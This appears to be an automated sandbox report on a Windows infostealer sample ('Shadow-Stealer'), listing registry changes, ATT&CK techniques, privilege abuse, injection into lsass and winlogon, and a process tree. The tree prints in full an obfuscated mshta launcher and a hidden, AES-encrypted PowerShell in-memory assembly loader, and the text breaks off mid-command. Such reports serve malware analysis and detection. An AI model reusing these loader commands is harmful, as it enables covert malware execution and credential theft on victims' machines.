Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\Registry\User\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\NotificationData	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4888 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Explorer.EXE

pid process

3332 Explorer.EXE

pid	process
4888	PING.EXE

pid	process
3332	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Shadow-Stealer.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe

pid	process
5052	Shadow-Stealer.bat.exe
5052	Shadow-Stealer.bat.exe
5052	Shadow-Stealer.bat.exe
4804	dllhost.exe
4804	dllhost.exe
4804	dllhost.exe
4804	dllhost.exe
3852	dllhost.exe
3852	dllhost.exe
3852	dllhost.exe
3852	dllhost.exe
5052	Shadow-Stealer.bat.exe
5052	Shadow-Stealer.bat.exe
3376	$sxr-powershell.exe
3376	$sxr-powershell.exe
3376	$sxr-powershell.exe
3376	$sxr-powershell.exe
3288	dllhost.exe
3288	dllhost.exe
3288	dllhost.exe
3288	dllhost.exe
4968	dllhost.exe
4968	dllhost.exe
4968	dllhost.exe
4968	dllhost.exe
3376	$sxr-powershell.exe
3376	$sxr-powershell.exe
4716	$sxr-powershell.exe
3376	$sxr-powershell.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
3340	dllhost.exe
3340	dllhost.exe
4716	$sxr-powershell.exe
4716	$sxr-powershell.exe
3340	dllhost.exe
3340	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
3340	dllhost.exe
3340	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4716	$sxr-powershell.exe
4716	$sxr-powershell.exe
3340	dllhost.exe
3340	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
3340	dllhost.exe
3340	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
3340	dllhost.exe
3340	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
3340	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3332 Explorer.EXE

pid	process
3332	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Shadow-Stealer.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	5052	Shadow-Stealer.bat.exe
Token: SeDebugPrivilege	5052	Shadow-Stealer.bat.exe
Token: SeDebugPrivilege	4804	dllhost.exe
Token: SeDebugPrivilege	3852	dllhost.exe
Token: SeDebugPrivilege	3376	$sxr-powershell.exe
Token: SeDebugPrivilege	3376	$sxr-powershell.exe
Token: SeDebugPrivilege	3288	dllhost.exe
Token: SeDebugPrivilege	4968	dllhost.exe
Token: SeDebugPrivilege	4716	$sxr-powershell.exe
Token: SeDebugPrivilege	3376	$sxr-powershell.exe
Token: SeDebugPrivilege	4656	dllhost.exe
Token: SeDebugPrivilege	3340	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2652	svchost.exe
Token: SeIncreaseQuotaPrivilege	2652	svchost.exe
Token: SeSecurityPrivilege	2652	svchost.exe
Token: SeTakeOwnershipPrivilege	2652	svchost.exe
Token: SeLoadDriverPrivilege	2652	svchost.exe
Token: SeSystemtimePrivilege	2652	svchost.exe
Token: SeBackupPrivilege	2652	svchost.exe
Token: SeRestorePrivilege	2652	svchost.exe
Token: SeShutdownPrivilege	2652	svchost.exe
Token: SeSystemEnvironmentPrivilege	2652	svchost.exe
Token: SeUndockPrivilege	2652	svchost.exe
Token: SeManageVolumePrivilege	2652	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2652	svchost.exe
Token: SeIncreaseQuotaPrivilege	2652	svchost.exe
Token: SeSecurityPrivilege	2652	svchost.exe
Token: SeTakeOwnershipPrivilege	2652	svchost.exe
Token: SeLoadDriverPrivilege	2652	svchost.exe
Token: SeSystemtimePrivilege	2652	svchost.exe
Token: SeBackupPrivilege	2652	svchost.exe
Token: SeRestorePrivilege	2652	svchost.exe
Token: SeShutdownPrivilege	2652	svchost.exe
Token: SeSystemEnvironmentPrivilege	2652	svchost.exe
Token: SeUndockPrivilege	2652	svchost.exe
Token: SeManageVolumePrivilege	2652	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2652	svchost.exe
Token: SeIncreaseQuotaPrivilege	2652	svchost.exe
Token: SeSecurityPrivilege	2652	svchost.exe
Token: SeTakeOwnershipPrivilege	2652	svchost.exe
Token: SeLoadDriverPrivilege	2652	svchost.exe
Token: SeSystemtimePrivilege	2652	svchost.exe
Token: SeBackupPrivilege	2652	svchost.exe
Token: SeRestorePrivilege	2652	svchost.exe
Token: SeShutdownPrivilege	2652	svchost.exe
Token: SeSystemEnvironmentPrivilege	2652	svchost.exe
Token: SeUndockPrivilege	2652	svchost.exe
Token: SeManageVolumePrivilege	2652	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2652	svchost.exe
Token: SeIncreaseQuotaPrivilege	2652	svchost.exe
Token: SeSecurityPrivilege	2652	svchost.exe
Token: SeTakeOwnershipPrivilege	2652	svchost.exe
Token: SeLoadDriverPrivilege	2652	svchost.exe
Token: SeSystemtimePrivilege	2652	svchost.exe
Token: SeBackupPrivilege	2652	svchost.exe
Token: SeRestorePrivilege	2652	svchost.exe
Token: SeShutdownPrivilege	2652	svchost.exe
Token: SeSystemEnvironmentPrivilege	2652	svchost.exe
Token: SeUndockPrivilege	2652	svchost.exe
Token: SeManageVolumePrivilege	2652	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2652	svchost.exe
Token: SeIncreaseQuotaPrivilege	2652	svchost.exe
Token: SeSecurityPrivilege	2652	svchost.exe
Token: SeTakeOwnershipPrivilege	2652	svchost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

$sxr-powershell.exeExplorer.EXE

pid process

3376 $sxr-powershell.exe
3332 Explorer.EXE
Suspicious use of UnmapMainImage 2 IoCs

Processes:

RuntimeBroker.exeExplorer.EXE

pid process

3908 RuntimeBroker.exe
3332 Explorer.EXE

pid	process
3376	$sxr-powershell.exe
3332	Explorer.EXE

pid	process
3908	RuntimeBroker.exe
3332	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeShadow-Stealer.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exedllhost.exe

description	pid	process	target process
PID 4272 wrote to memory of 5052	4272	cmd.exe	Shadow-Stealer.bat.exe
PID 4272 wrote to memory of 5052	4272	cmd.exe	Shadow-Stealer.bat.exe
PID 5052 wrote to memory of 4804	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 4804	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 4804	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 4804	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 4804	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 4804	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 4804	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 wrote to memory of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 4916 wrote to memory of 752	4916	$sxr-mshta.exe	$sxr-cmd.exe
PID 4916 wrote to memory of 752	4916	$sxr-mshta.exe	$sxr-cmd.exe
PID 752 wrote to memory of 3376	752	$sxr-cmd.exe	$sxr-powershell.exe
PID 752 wrote to memory of 3376	752	$sxr-cmd.exe	$sxr-powershell.exe
PID 3376 wrote to memory of 3288	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 3288	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 3288	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 3288	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 3288	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 3288	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 3288	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4716	3376	$sxr-powershell.exe	$sxr-powershell.exe
PID 3376 wrote to memory of 4716	3376	$sxr-powershell.exe	$sxr-powershell.exe
PID 3376 wrote to memory of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 wrote to memory of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 4656 wrote to memory of 608	4656	dllhost.exe	winlogon.exe
PID 4656 wrote to memory of 696	4656	dllhost.exe	lsass.exe
PID 4656 wrote to memory of 980	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 428	4656	dllhost.exe	dwm.exe
PID 4656 wrote to memory of 456	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 976	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 1056	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 1068	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 1160	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 1184	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 1272	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 1304	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 1356	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 1456	4656	dllhost.exe	svchost.exe
PID 4656 wrote to memory of 1504	4656	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4248 attrib.exe

pid	process
4248	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:608

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:428

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5b0b2b69-7264-4637-9a9f-641bccea46a2}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4804

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{34da9efd-bc13-45a5-9d1a-5be862586030}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3288

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5194bba6-089c-407d-961a-c0a6163ad991}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4656

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{159c1918-d815-4e9a-b657-4504d0c9c6b0}
2⤵
PID:3380

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7614eb74-0942-4b90-9c42-88b23fff0a53}
2⤵
PID:6044

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8f615197-7f83-426f-bcb7-797e9a5d7bcc}
2⤵
PID:5628

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ad978389-d6e9-450a-b0c6-360a9b71acf8}
2⤵
PID:5760

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e33ab120-c4f4-44f4-b064-46101783cf7a}
2⤵
PID:5236

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bf65b796-427b-4c14-8060-f7bb17b83de9}
2⤵
PID:5532

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5532 -s 312
3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6100

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:456

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1160

C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4916

C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1228

C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, 